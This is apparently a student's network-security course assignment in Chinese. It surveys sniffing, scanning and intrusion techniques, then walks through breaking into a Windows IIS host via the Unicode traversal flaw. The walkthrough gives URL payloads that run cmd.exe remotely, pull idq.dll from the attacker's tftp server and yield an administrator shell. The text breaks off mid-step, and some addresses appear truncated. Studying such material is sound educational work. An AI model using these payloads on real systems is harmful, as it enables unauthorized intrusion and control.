《网络安全技术》课程考查大作业 (19).docVIP

大连外国语大学软件学院 成绩评定： 成绩评定： 专业： 信管（英日） 年级：2013级 班级：21班 姓名： 杜行 学号：130452132 黑客常用网络侦听、网络扫描、网络入侵方法简介 1.1黑客常用网络侦听方法： 当黑客登录网络主机并取得超级用户权限后，若要登录到其它主机，使用网络监听可以有效地截获网络上的数据，这是黑客使用最普遍的方法。侦听有多种途径，一种是将侦听工具软件放到网络连接的设备或者放到可以控制网络连接设备的电脑上，这里的网络连接设备，比如网关服务器，比如路由器。当然要实现这样的效果可能也需要其他黑客技术，比如通过木马方式将嗅探器发给某个网络管理员，使其不自觉的为攻击者进行了安装。另外一种是针对不安全的局域网（采用交换hub实现），放到个人电脑上就可以实现对整个局域网的侦听，这里的原理是通过共享hub获得一个子网内需要接收的数据时，并不是直接发送到指定主机，而是通过广播方式发送到每个电脑，对于处于接受者地位的电脑就会处理该数据，而其他非接受者的电脑就会过滤这些数据，这些操作与电脑操作者无关，是系统自动完成的，但是电脑操作者如果有意的话，他是可以将那些原本不属于他的数据打开的。以上就是网络侦听的主要方法。有许多监听软件，除最著名的Sniffer Pro以外，还有一些常用的监听软件：Iris，Win Sniffer，pswmonitor和非交换环境局域网的fssniffer等。 1.2黑客常用网络扫描方法： 黑客使用的网络扫描方法分为主动式和被动式两种策略。被动式策略就是在主机上，对系统中不合适的设置，脆弱的口令以及其他同安全规则抵触的对象进行检查，它不会对系统造成破坏。主动式策略是基于网络的，它通过执行一些脚本文件模拟对系统进行攻击的行为并记录系统的反应，来发现其中的漏洞。扫描的目的就是为了利用多种工具来攻击目标的IP地址或者地址的主机，主动式扫描对系统进行模拟攻击，可能会对系统造成破坏。网络扫描是确认网络运行的主机的工作程序，或是为了对主机进行攻击，或是为了网络安全评估。网络扫描程序，如Ping扫射和端口扫描，返回关于哪个IP地址映射有主机连接到因特网上的并是工作的，这些主机提供什么样的服务的信息。另一种扫描方法是反向映射，返回关于哪个IP地址上没有映射出活动的主机的信息，这使攻击者能假设出可行的地址。包括系统用户扫描、开放端口扫描、共享目录扫描、利用TCP协议进行端口扫描、漏洞扫描等。 1.2黑客常用网络入侵方法： 入侵系统类攻击包括：信息窃听，口令攻击，漏洞攻击，缓冲区溢出攻击，获取ROOT口令。欺骗类攻击，拒绝服务攻击包括拒绝服务攻击和分布式拒绝服务攻击。以及利用病毒攻击，对防火墙等安全设备的攻击，木马程序攻击和后门攻击等。目前常用的网络攻击手有社会工程学攻击，物理攻击，暴力攻击，利用Unicode漏洞攻击，利用缓冲区溢出漏洞进行攻击等技术。还有口令入侵，特洛伊木马，监听法，E-mail技术，病毒技术，隐藏技术等网络入侵方法。 第一种入侵方法 通过UniCode漏洞入侵对方系统、 2.1 方法原理 Unicode漏洞是攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件，从而使该计算机的文件暴露，且可随意执行和更改文件的漏洞。 2.2 入侵过程 2.2.1将tftp32 idq.dll ipsc.exe放在C盘根目录下，以tftp32建立本地服务器，如图2-1 图2-1 本地服务器已经开启 2.2.2在IE中输入如下字符串’09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll’，可以把idq.dll拷贝至目标机的C盘根目录。 图2-2 显示如图中信息，实际上不影响结果。 2.2.3再通过” 0/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”可以查看目标机系统盘的目录结构，发现idq.dll已经成功上传。如图2-3。 图2-3 idq.dll已经存在于目标机的系统根目录下 2.2.4拷贝ispc.exe文件到本地计算机的C盘根目录，在DOS命令行下执行命令： “ispc.exe 09/scripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限，入侵的过程如图2-4. 图2-4具有管理员权限的Dos入侵截图。 2.2.5但现在为止，已经可以在对方计算机上做管理员可以做的一切事情，比如添加用户，建立一个用户等，如图